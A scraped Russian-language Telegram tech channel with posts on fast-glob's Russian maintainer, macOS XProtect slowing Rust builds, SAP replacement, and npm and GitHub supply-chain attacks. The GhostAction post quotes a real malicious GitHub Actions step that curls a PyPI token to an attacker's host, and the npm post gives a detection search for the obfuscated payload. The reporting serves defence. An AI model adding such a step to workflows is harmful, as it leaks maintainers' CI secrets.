Технологический Болт Генона
В РФ сейчас достаточно популярна тема со SBOM и вообще контролем зависимостей, потому что много каких зависимостей из open source оказывали и могут оказать деструктивное влияние так сказатб 🌝 Но тут случилось ВНЕЗАПНОЕ1!11!. Hunted Labs озаботились зависимостями…
В мае я кидал пост о том, что Hunted Labs обнаружили в крупных проектах Go-шный пакет разрабатывающийся ВК
https://xn--r1a.website/tech_b0lt_Genona/5315
Теперь ещё одно "открытие" от них же
Минобороны США использует открытую утилиту fast-glob разработчика из РФ, автор ответил на вопросы безопасности проекта
https://habr.com/ru/news/941484/
По информации иностранных СМИ (The Register, Hunted Labs), в информационных системах Министерства обороны США активно используется открытая утилита fast‑glob (https://www.npmjs.com/package/fast-glob) от разработчика из РФ Дениса Малиночкина (mrmlnc), который работает в «Яндексе».
fast‑glob — это очень быстрая и эффективная библиотека для Node.js, которая разрабатывается с 2016 года. Она широко используется в тысячах проектов, включая более 30 систем Министерства обороны США.
По информации профильных источников, нет никаких доказательств вредоносной активности в этом проекте. Но эксперты по кибербезопасности предупреждают, что отсутствие контроля за столь критически важными проектами с открытым исходным кодом делает их уязвимыми для потенциального использования со стороны государственных структур.
Соучредитель Hunted Labs Хейден Смит заявил, что подобные проекты вызывают беспокойство. «Каждый фрагмент кода в таких проектах не обязательно попадает под подозрение, но популярные пакеты, не находящиеся под внешним контролем, легко могут быть скомпрометированы. В целом, сообщество разработчиков ПО с открытым исходным кодом должно уделять больше внимания этому риску и минимизировать его», — заявил Смит.
Ответ Малиночкина на исследование и подозрения Hunted Labs:
«Проект fast‑glob — популярное решение для поиска файлов по шаблонам в файловой системе. Более 7 лет (с 2016 года) я разрабатываю и поддерживаю этот проект самостоятельно. Проект был начат до моего начала работы в «Яндексе», и его разработка или поддержка никогда не входили в мои профессиональные обязанности в компании. Я выпустил этот проект с открытым исходным кодом ещё в 2016 году, полагая, что он может быть полезен разработчикам, и рад, что так получилось.
. . .
Я поддерживаю проект в одиночку, поскольку за эти годы сообщество не выразило потребности в более активном участии. Это типично для решений инфраструктурного уровня, с которыми пользователи не взаимодействуют напрямую. Я всегда открыт для вклада сообщества. Также хотел бы ещё раз подчеркнуть, что как исходный код, так и distributed package полностью открыты и доступны для проверки потенциальными пользователями.
Отвечая на ваш вопрос: никто никогда не просил меня манипулировать fast‑glob, вносить скрытые изменения в проект или собирать и делиться системными данными. Я считаю, что открытый исходный код основан на доверии и разнообразии»
Оригинал
Not So Fast and Furious: Popping Fast-Glob’s Hood
https://huntedlabs.com/popping-fast-globs-hood/
https://xn--r1a.website/tech_b0lt_Genona/5315
Теперь ещё одно "открытие" от них же
Минобороны США использует открытую утилиту fast-glob разработчика из РФ, автор ответил на вопросы безопасности проекта
https://habr.com/ru/news/941484/
По информации иностранных СМИ (The Register, Hunted Labs), в информационных системах Министерства обороны США активно используется открытая утилита fast‑glob (https://www.npmjs.com/package/fast-glob) от разработчика из РФ Дениса Малиночкина (mrmlnc), который работает в «Яндексе».
fast‑glob — это очень быстрая и эффективная библиотека для Node.js, которая разрабатывается с 2016 года. Она широко используется в тысячах проектов, включая более 30 систем Министерства обороны США.
По информации профильных источников, нет никаких доказательств вредоносной активности в этом проекте. Но эксперты по кибербезопасности предупреждают, что отсутствие контроля за столь критически важными проектами с открытым исходным кодом делает их уязвимыми для потенциального использования со стороны государственных структур.
Соучредитель Hunted Labs Хейден Смит заявил, что подобные проекты вызывают беспокойство. «Каждый фрагмент кода в таких проектах не обязательно попадает под подозрение, но популярные пакеты, не находящиеся под внешним контролем, легко могут быть скомпрометированы. В целом, сообщество разработчиков ПО с открытым исходным кодом должно уделять больше внимания этому риску и минимизировать его», — заявил Смит.
Ответ Малиночкина на исследование и подозрения Hunted Labs:
«Проект fast‑glob — популярное решение для поиска файлов по шаблонам в файловой системе. Более 7 лет (с 2016 года) я разрабатываю и поддерживаю этот проект самостоятельно. Проект был начат до моего начала работы в «Яндексе», и его разработка или поддержка никогда не входили в мои профессиональные обязанности в компании. Я выпустил этот проект с открытым исходным кодом ещё в 2016 году, полагая, что он может быть полезен разработчикам, и рад, что так получилось.
. . .
Я поддерживаю проект в одиночку, поскольку за эти годы сообщество не выразило потребности в более активном участии. Это типично для решений инфраструктурного уровня, с которыми пользователи не взаимодействуют напрямую. Я всегда открыт для вклада сообщества. Также хотел бы ещё раз подчеркнуть, что как исходный код, так и distributed package полностью открыты и доступны для проверки потенциальными пользователями.
Отвечая на ваш вопрос: никто никогда не просил меня манипулировать fast‑glob, вносить скрытые изменения в проект или собирать и делиться системными данными. Я считаю, что открытый исходный код основан на доверии и разнообразии»
Оригинал
Not So Fast and Furious: Popping Fast-Glob’s Hood
https://huntedlabs.com/popping-fast-globs-hood/
😁17❤14🤡6💊5🥴2🗿2👍1
Forwarded from Блог*
#prog #article
Faster Rust builds on Mac
Nicholas Nethercote заметил, что на Mac компиляция одного Rust-проекта была подозрительно долгой. Замеры времени компиляции через cargo показали, что очень долго исполняются билд-скрипты, причём каждый следующий дольше предыдущего. Как оказалась, это антивирусная фича MacOS (называется XProtect), которая сканирует исполняемые файлы на признаки malware при первом запуске. Билд-скрипты компилируются и исполняются каждый раз заново при компиляции, поэтому постоянно страдают от этих задержек. Замедление же объясняется тем, что процесс, который сканирует исполняемые файлы, однопоточный.
По очевидным причинам это ускоряет и cargo run, и cargo test (особенно для доктестов до edition 2024, каждый из которых компилируется в отдельный бинарник).
Из забавного: отключение XProtect снизило для Mads Marquart время для прогона всех UI-тестов rustc (около 4000 исполняемых файлов) с 9 мин 42 с до 3 мин 33 с.
Faster Rust builds on Mac
Did you know that macOS has a secret setting that can make Rust builds faster? It can also make Rust tests faster (sometimes massively so). It probably even has similar effects for other compiled languages such as C, C++, Go, and Swift. It sounds crazy, but read on…
Nicholas Nethercote заметил, что на Mac компиляция одного Rust-проекта была подозрительно долгой. Замеры времени компиляции через cargo показали, что очень долго исполняются билд-скрипты, причём каждый следующий дольше предыдущего. Как оказалась, это антивирусная фича MacOS (называется XProtect), которая сканирует исполняемые файлы на признаки malware при первом запуске. Билд-скрипты компилируются и исполняются каждый раз заново при компиляции, поэтому постоянно страдают от этих задержек. Замедление же объясняется тем, что процесс, который сканирует исполняемые файлы, однопоточный.
You can avoid these scans by adding Terminal (or any alternative terminal app you are using, such as iTerm) as a “developer tool” in System Settings. See these docs for details.
<...>
Please note that if you do this you are disabling an OS security feature. You should not do it unless you are comfortable with the potential speed/security trade-off.
По очевидным причинам это ускоряет и cargo run, и cargo test (особенно для доктестов до edition 2024, каждый из которых компилируется в отдельный бинарник).
The status quo is that this behaviour is documented in a few obscure places and 99%+ of Mac users are unaware. Fortunately, Mads [Marquart] has a draft PR for Cargo that detects if XProtect is enabled and issues a warning to the user explaining its impact and how to disable it.
Из забавного: отключение XProtect снизило для Mads Marquart время для прогона всех UI-тестов rustc (около 4000 исполняемых файлов) с 9 мин 42 с до 3 мин 33 с.
Nicholas Nethercote
Faster Rust builds on Mac
Did you know that macOS has a secret setting that can make Rust builds faster? It can also make Rust tests faster (sometimes massively so). It probably even has similar effects for other compiled languages such as C, C++, Go, and Swift. It sounds crazy, but…
🤣21❤3👍3
Forwarded from Akiba | Hackspace
Провели лекцию по атакам на энергопотребление!
Запись: https://youtube.com/live/UqMZSrMKj_Y
Материалы и комменты — в топике клуба
Akiba Hackspace | Как нас найти? | Чат | YouTube
Запись: https://youtube.com/live/UqMZSrMKj_Y
Материалы и комменты — в топике клуба
Akiba Hackspace | Как нас найти? | Чат | YouTube
❤8👍1
Про замену SAP на 1С я писал два раза
https://xn--r1a.website/tech_b0lt_Genona/3093 (2022 год)
https://xn--r1a.website/tech_b0lt_Genona/4835 (2024 год)
и я настроен был скептически про возможность такого перехода
Но тут я нашёл первый публичный кейс, который похож на реальный переход, а не просто какие-то рассказы про то как "корабли бороздят просторы Большого театра".
Если есть кто знает что-то ещё из этой серии или подробности этого кейса, то пишите в личку @rusdacent или комментарии.
В июне проходил "CNews FORUM Кейсы"(https://cnewsforum.ru/cases/) и там выступала Юлия Стружкова из "Технологий ОФС" с докладом "Переход с SAP на российские решения в сжатые сроки".
Презентацию выложили (положу её в комментарии), а записи я не нашёл (хотя другие присутствуют https://www.youtube.com/playlist?list=PLDsm_XvhumCUGMg2-k3MTexDyH3QJXTSw )
Я нашёл её же похожий доклад из конца 2023 года (прикреплю к посту)
Импортозамещение в сжатые сроки. Переход нефтесервисной компании АО «Технологии ОФС» с импортных решений на «1С:ERP. Управление холдингом»
https://v8.1c.ru/metod/video/importozameshchenie-v-szhatye-sroki-perekhod-nefteservisnoy-kompanii-ao-tekhnologii-ofs-s-importnykh.htm
В целом даже преза почти такая же, поэтому можно послушать и понять какие проблемы были, что делали и т.д.
Для меня главных слайда два (картинки прикрепил к посту).
Первый эта таблица замены продуктов, а второй про то какие модули пришлось пилить самим.
И это то почему я до сих пор с некоторым скепсисом отношусь к глобальному переезду с SAP, потому что SAP это огромная экосистема с кучей движухи вокруг, с наработками за десятилетия всего и вся под кучу ситуаций, производств и прочее.
"Технологии ОФС" решили конкретный пул задач (в рамках всей экосистемы SAP думаю, что небольшой) под конкретный кейс. Видимо, так придётся поступать и всем остальным, если им придётся переехать, и пилить свои какие-то куски нехватающей функциональности. Что делать тем у кого нет денег на какие-то доработки пока не понимаю.
В любом случае мне этот доклад показался действительно интересным, поэтому решил поделиться.
https://xn--r1a.website/tech_b0lt_Genona/3093 (2022 год)
https://xn--r1a.website/tech_b0lt_Genona/4835 (2024 год)
и я настроен был скептически про возможность такого перехода
Но тут я нашёл первый публичный кейс, который похож на реальный переход, а не просто какие-то рассказы про то как "корабли бороздят просторы Большого театра".
Если есть кто знает что-то ещё из этой серии или подробности этого кейса, то пишите в личку @rusdacent или комментарии.
В июне проходил "CNews FORUM Кейсы"(https://cnewsforum.ru/cases/) и там выступала Юлия Стружкова из "Технологий ОФС" с докладом "Переход с SAP на российские решения в сжатые сроки".
Презентацию выложили (положу её в комментарии), а записи я не нашёл (хотя другие присутствуют https://www.youtube.com/playlist?list=PLDsm_XvhumCUGMg2-k3MTexDyH3QJXTSw )
Я нашёл её же похожий доклад из конца 2023 года (прикреплю к посту)
Импортозамещение в сжатые сроки. Переход нефтесервисной компании АО «Технологии ОФС» с импортных решений на «1С:ERP. Управление холдингом»
https://v8.1c.ru/metod/video/importozameshchenie-v-szhatye-sroki-perekhod-nefteservisnoy-kompanii-ao-tekhnologii-ofs-s-importnykh.htm
В целом даже преза почти такая же, поэтому можно послушать и понять какие проблемы были, что делали и т.д.
Для меня главных слайда два (картинки прикрепил к посту).
Первый эта таблица замены продуктов, а второй про то какие модули пришлось пилить самим.
И это то почему я до сих пор с некоторым скепсисом отношусь к глобальному переезду с SAP, потому что SAP это огромная экосистема с кучей движухи вокруг, с наработками за десятилетия всего и вся под кучу ситуаций, производств и прочее.
"Технологии ОФС" решили конкретный пул задач (в рамках всей экосистемы SAP думаю, что небольшой) под конкретный кейс. Видимо, так придётся поступать и всем остальным, если им придётся переехать, и пилить свои какие-то куски нехватающей функциональности. Что делать тем у кого нет денег на какие-то доработки пока не понимаю.
В любом случае мне этот доклад показался действительно интересным, поэтому решил поделиться.
👍12❤4🤡3
Технологический Болт Генона
Про замену SAP на 1С я писал два раза https://xn--r1a.website/tech_b0lt_Genona/3093 (2022 год) https://xn--r1a.website/tech_b0lt_Genona/4835 (2024 год) и я настроен был скептически про возможность такого перехода Но тут я нашёл первый публичный кейс, который похож на реальный…
В контексте прошлого поста в личку принесли вакансию от ВК https://team.vk.company/vacancy/41375/
> Наш основной проект — создание личного кабинета, позволяющего удобно получать необходимую информацию и оформлять кадровые или финансовые заявки.
И там среди требований
> Будет плюсом
> Владение ABAP
ABAP это язык программирования от SAP
Так что ВК тоже пилит замену SAP 🌝
UPD
В личке подсказывают, что могут пилить ещё какую-то интеграцию.
> Наш основной проект — создание личного кабинета, позволяющего удобно получать необходимую информацию и оформлять кадровые или финансовые заявки.
И там среди требований
> Будет плюсом
> Владение ABAP
ABAP это язык программирования от SAP
Так что ВК тоже пилит замену SAP 🌝
UPD
В личке подсказывают, что могут пилить ещё какую-то интеграцию.
😁17🤡11👌3🌚2
У меня есть серия постов про то как наше железо привязывают всё больше к облакам, подпискам и прочей шляпе
https://xn--r1a.website/tech_b0lt_Genona/5163
https://xn--r1a.website/tech_b0lt_Genona/5166
https://xn--r1a.website/tech_b0lt_Genona/5195
https://xn--r1a.website/tech_b0lt_Genona/5197
Вот ещё два классных примера
На первом видео показан Mercedes в котором куча платных опций сделали: CarPlay - €360, подсветка - €9, обзор на 360° - €18, Distronic - €15, пакет приложений - €345.
На втором видео сюжет для "Чёрного зеркала" (ну или "Чёрное зеркало" просочилось в реальность). Это китайский общественный туалет с платной туалетной бумагой, чтобы получить её, необходимо посмотреть рекламу. Следующим шагом предлагаю открывать дверь в кабинку только просмотра двух рекламных роликов.
https://xn--r1a.website/tech_b0lt_Genona/5163
https://xn--r1a.website/tech_b0lt_Genona/5166
https://xn--r1a.website/tech_b0lt_Genona/5195
https://xn--r1a.website/tech_b0lt_Genona/5197
Вот ещё два классных примера
На первом видео показан Mercedes в котором куча платных опций сделали: CarPlay - €360, подсветка - €9, обзор на 360° - €18, Distronic - €15, пакет приложений - €345.
На втором видео сюжет для "Чёрного зеркала" (ну или "Чёрное зеркало" просочилось в реальность). Это китайский общественный туалет с платной туалетной бумагой, чтобы получить её, необходимо посмотреть рекламу. Следующим шагом предлагаю открывать дверь в кабинку только просмотра двух рекламных роликов.
😁34🗿4👏3❤1
Тут опять NPM поломали
Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages,
backslash (0.26m downloads per week)
chalk-template (3.9m downloads per week)
supports-hyperlinks (19.2m downloads per week)
has-ansi (12.1m downloads per week)
simple-swizzle (26.26m downloads per week)
color-string (27.48m downloads per week)
error-ex (47.17m downloads per week)
color-name (191.71m downloads per week)
is-arrayish (73.8m downloads per week)
slice-ansi (59.8m downloads per week)
color-convert (193.5m downloads per week)
wrap-ansi (197.99m downloads per week)
ansi-regex (243.64m downloads per week)
supports-color (287.1m downloads per week)
strip-ansi (261.17m downloads per week)
chalk (299.99m downloads per week)
debug (357.6m downloads per week)
ansi-styles (371.41m downloads per week)
All together, these packages have more than 2 billion downloads per week.
npm debug and chalk packages compromised
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised
Был подсунут обфусцированный код, который перехватывал трафик
> This malware is essentially a browser-based interceptor that hijacks both network traffic and application APIs. It injects itself into functions like fetch, XMLHttpRequest, and common wallet interfaces, then silently rewrites values in requests and responses.
Украли доступ через фишинг у одного мантейнера
https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydje4zqis2y
В статье утверждается, что похожей атаке подвергся и мантейнер других пакетов
Таблицу с версиями пакетов прикрепил к посту
Дополнительные ссылки почитать
We Just Found Malicious Code in the Popular NPM Package
https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the
https://news.ycombinator.com/item?id=45169657
npm Author Qix Compromised via Phishing Email in Major Supply Chain Attack
https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack
Issue
https://github.com/chalk/chalk/issues/656
https://github.com/debug-js/debug/issues/1005#issuecomment-3266885191
Что бы проверить нет ли в ваших зависимостях гадости
Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages,
backslash (0.26m downloads per week)
chalk-template (3.9m downloads per week)
supports-hyperlinks (19.2m downloads per week)
has-ansi (12.1m downloads per week)
simple-swizzle (26.26m downloads per week)
color-string (27.48m downloads per week)
error-ex (47.17m downloads per week)
color-name (191.71m downloads per week)
is-arrayish (73.8m downloads per week)
slice-ansi (59.8m downloads per week)
color-convert (193.5m downloads per week)
wrap-ansi (197.99m downloads per week)
ansi-regex (243.64m downloads per week)
supports-color (287.1m downloads per week)
strip-ansi (261.17m downloads per week)
chalk (299.99m downloads per week)
debug (357.6m downloads per week)
ansi-styles (371.41m downloads per week)
All together, these packages have more than 2 billion downloads per week.
npm debug and chalk packages compromised
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised
Был подсунут обфусцированный код, который перехватывал трафик
> This malware is essentially a browser-based interceptor that hijacks both network traffic and application APIs. It injects itself into functions like fetch, XMLHttpRequest, and common wallet interfaces, then silently rewrites values in requests and responses.
Украли доступ через фишинг у одного мантейнера
https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydje4zqis2y
В статье утверждается, что похожей атаке подвергся и мантейнер других пакетов
Таблицу с версиями пакетов прикрепил к посту
Дополнительные ссылки почитать
We Just Found Malicious Code in the Popular NPM Package
https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the
https://news.ycombinator.com/item?id=45169657
npm Author Qix Compromised via Phishing Email in Major Supply Chain Attack
https://socket.dev/blog/npm-author-qix-compromised-in-major-supply-chain-attack
Issue
https://github.com/chalk/chalk/issues/656
https://github.com/debug-js/debug/issues/1005#issuecomment-3266885191
Что бы проверить нет ли в ваших зависимостях гадости
$ rg -uu --max-columns=80 --glob '*.js' _0x112fa8
😁17🔥5🫡4❤2🤡1
Технологический Болт Генона
Тут опять NPM поломали Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages, backslash (0.26m downloads per week) chalk…
Есть мнение, что крипту подломали через эту "ситуацию"
https://x.com/DegenerateNews/status/1965115986451083530
https://x.com/swissborg/status/1965119220347535465
https://x.com/DegenerateNews/status/1965115986451083530
https://x.com/swissborg/status/1965119220347535465
😁5🤡2🙊1
В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub
https://www.opennet.ru/opennews/art.shtml?num=63831
Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.
Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.
https://github.com/eru123/vue-skidd/commit/f650e79ee63fafd5c3d8e6139b38a3c4cf05a766
Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.
Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер [5 сентября] вредоносные коммиты были отменены примерно в 100 репозиториях.
Список коммитов по проектам (671 штука)
https://github.com/search?q=%22Add+Github+Actions+Security+workflow%22&type=commits
Оригинал
The GhostAction Campaign: 3,325 Secrets Stolen Through Compromised GitHub Workflows
https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/
https://www.opennet.ru/opennews/art.shtml?num=63831
Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.
Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.
https://github.com/eru123/vue-skidd/commit/f650e79ee63fafd5c3d8e6139b38a3c4cf05a766
Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.
- name: Github Actions Security
run: |
curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер [5 сентября] вредоносные коммиты были отменены примерно в 100 репозиториях.
Список коммитов по проектам (671 штука)
https://github.com/search?q=%22Add+Github+Actions+Security+workflow%22&type=commits
Оригинал
The GhostAction Campaign: 3,325 Secrets Stolen Through Compromised GitHub Workflows
https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/
🤣15👍7
16–17 сентября планирую быть на DevOops - https://devoops.ru/
В этом году без доклада 🌝
Если кто хочет пересечься, то пишите в комменты или личку
В этом году без доклада 🌝
Если кто хочет пересечься, то пишите в комменты или личку
👍8👎2
Forwarded from Стой под стрелой (Nikita Prokopov)
Смотрел тут на очередное веб-приложение, там в ряд — текстовое поле, две кнопки, выпадайка. Все примерно одного дизайна (серая однопиксельная рамка, белый фон) и примерно одного размера. Примерно, потому что не точно — очевидно они должны были быть одинаковыми, но не смогли.
Простейшее наблюдение, которое тут можно сделать — программа победила программиста. Инструмент стал настолько сложным, что его уже нельзя контролировать, или можно, но ценой чудовищных затрат, вот никто и не пытается.
Другое наблюдение — про эволюцию АПИ. Казалось бы, веб-технолгии должны были упростить жизнь разработчиков. Каждое изменение добавляло новый _простой_ способ что-то делать. И вот прошло 30 лет, мы прошли длинный путь маленьких инкрементальных изменений и оказались в точке, где делать простые вещи не просто, а наоборот, сложно.
Казалось бы, как это бы выглядело в идеальном случае? Пришел программист, сказал
Что же произошло вместо этого? У вычисления высоты появились правила. Нельзя теперь просто указать высоту, она вычисляется, с одной стороны, от размера шрифта снизу, а с другой от контейнера сверху. Еще бордер там добавится, маргин какой-нибудь схлопнется, ну вы поняли. Очень непрозрачные правила, а главное — их очень много. Причем каждое правило, когда добавляли, наверняка что-то упрощало. А теперь все вместе они стали просто непозноваемыми. Почему прямоугольник с заданной высотой с текстом отличается от прямоугольника с такой же высотой но без текста внутри? Поди разбери. Работает как-то и бог с ним.
Туда же эпидемия с центрированием. Раньше были шутки, что на вебе сложно вертикально центрировать div. Сейчас этот вопрос вроде бы порешали, div центрировать можно, а вот с текстом все еще проблемы. Опять же, потому что правила совершенно идиотские, никто не знает, как условный line-height работает. На весь интернет может быть одна статья про него, где человек разобрался, а остальные просто на глазок подгоняют, я уверен. И дизайнеры шрифтов, кстати, тут вообще не помогают.
Добавьте к этим идиотским правилам центрирования текста идиотскую моду на шрифты с иконками и вот мы в абсурдной ситуации, когда прямоугольник никто не может поставить ровно в другой прямоугольник.
Вы скажете, что я преувеличиваю, нагоняю драмы. По идее, да, в каждом конкретном случае можно сесть, разобраться и починить. Потенциально сделать нормально можно. Проблема в том, что трейдофф затраты/выгода сейчас сильно перевешен в сторону затрат, поэтому мало кто вообще пытается. Оно не должно было быть так сложно, алло! Простые вещи должны делаться просто.
Это все удивительная демонстрация, как на большом масштабе «умные» декларативные правила, которые должны помогать, скорее мешают, потому что их поведение сложно предсказать. И это не только веба касается, со SwiftUI та же беда — хотели сделать проще и высокоуровневее, а оказалось, что и неудобно, и ошибиться в разы легче, чем когда были простые и деревянные прямоугольники, которые ты ставил куда нужно.
Короче, сложных «умных» правил быть не должно. Нужно делать минимально необходимый минимум, но надежный, предсказуемый и познаваемый (т.е. должен в одну голову помещаться). Тогда это фундамент, на котором можно что-то строить. А так болото какое-то. Жидкий грунт.
Простейшее наблюдение, которое тут можно сделать — программа победила программиста. Инструмент стал настолько сложным, что его уже нельзя контролировать, или можно, но ценой чудовищных затрат, вот никто и не пытается.
Другое наблюдение — про эволюцию АПИ. Казалось бы, веб-технолгии должны были упростить жизнь разработчиков. Каждое изменение добавляло новый _простой_ способ что-то делать. И вот прошло 30 лет, мы прошли длинный путь маленьких инкрементальных изменений и оказались в точке, где делать простые вещи не просто, а наоборот, сложно.
Казалось бы, как это бы выглядело в идеальном случае? Пришел программист, сказал
height = 36px, ну может еще добавил, что текст надо по центру. И все. Работа сделана. Примерно так было в условном Дельфи, который до сих пор все вспоминают с теплотой. Секрет в том, что на этом и надо было бы остановиться. Но мы давно промчались мимо этой идеальной точки и теперь ее не видно даже в зеркале заднего вида.Что же произошло вместо этого? У вычисления высоты появились правила. Нельзя теперь просто указать высоту, она вычисляется, с одной стороны, от размера шрифта снизу, а с другой от контейнера сверху. Еще бордер там добавится, маргин какой-нибудь схлопнется, ну вы поняли. Очень непрозрачные правила, а главное — их очень много. Причем каждое правило, когда добавляли, наверняка что-то упрощало. А теперь все вместе они стали просто непозноваемыми. Почему прямоугольник с заданной высотой с текстом отличается от прямоугольника с такой же высотой но без текста внутри? Поди разбери. Работает как-то и бог с ним.
Туда же эпидемия с центрированием. Раньше были шутки, что на вебе сложно вертикально центрировать div. Сейчас этот вопрос вроде бы порешали, div центрировать можно, а вот с текстом все еще проблемы. Опять же, потому что правила совершенно идиотские, никто не знает, как условный line-height работает. На весь интернет может быть одна статья про него, где человек разобрался, а остальные просто на глазок подгоняют, я уверен. И дизайнеры шрифтов, кстати, тут вообще не помогают.
Добавьте к этим идиотским правилам центрирования текста идиотскую моду на шрифты с иконками и вот мы в абсурдной ситуации, когда прямоугольник никто не может поставить ровно в другой прямоугольник.
Вы скажете, что я преувеличиваю, нагоняю драмы. По идее, да, в каждом конкретном случае можно сесть, разобраться и починить. Потенциально сделать нормально можно. Проблема в том, что трейдофф затраты/выгода сейчас сильно перевешен в сторону затрат, поэтому мало кто вообще пытается. Оно не должно было быть так сложно, алло! Простые вещи должны делаться просто.
Это все удивительная демонстрация, как на большом масштабе «умные» декларативные правила, которые должны помогать, скорее мешают, потому что их поведение сложно предсказать. И это не только веба касается, со SwiftUI та же беда — хотели сделать проще и высокоуровневее, а оказалось, что и неудобно, и ошибиться в разы легче, чем когда были простые и деревянные прямоугольники, которые ты ставил куда нужно.
Короче, сложных «умных» правил быть не должно. Нужно делать минимально необходимый минимум, но надежный, предсказуемый и познаваемый (т.е. должен в одну голову помещаться). Тогда это фундамент, на котором можно что-то строить. А так болото какое-то. Жидкий грунт.
👍41🤡12🫡8👏3❤2😁1👌1
Forwarded from Zhovner Hub
Media is too big
VIEW IN TELEGRAM
[Видео] Концепт Flipper OS — операционной системы для Flipper One
Главные тезисы:
• Неизменный root
• Вместе с системой есть пачка предустановленных профилей системы с разными конфигами
• Юзер работает только внутри профилей. Все изменения профиля записываются поверх, как overlay
• Внутри профиля юзер может делать что угодно и писать в root
В этой схеме есть много непонятных мест. Буду рад любым мнениям.
PDF-файл презентации на видео: flipper_os_concept.pdf
Главные тезисы:
• Неизменный root
• Вместе с системой есть пачка предустановленных профилей системы с разными конфигами
• Юзер работает только внутри профилей. Все изменения профиля записываются поверх, как overlay
• Внутри профиля юзер может делать что угодно и писать в root
В этой схеме есть много непонятных мест. Буду рад любым мнениям.
PDF-файл презентации на видео: flipper_os_concept.pdf
🤡16👍7🗿6❤1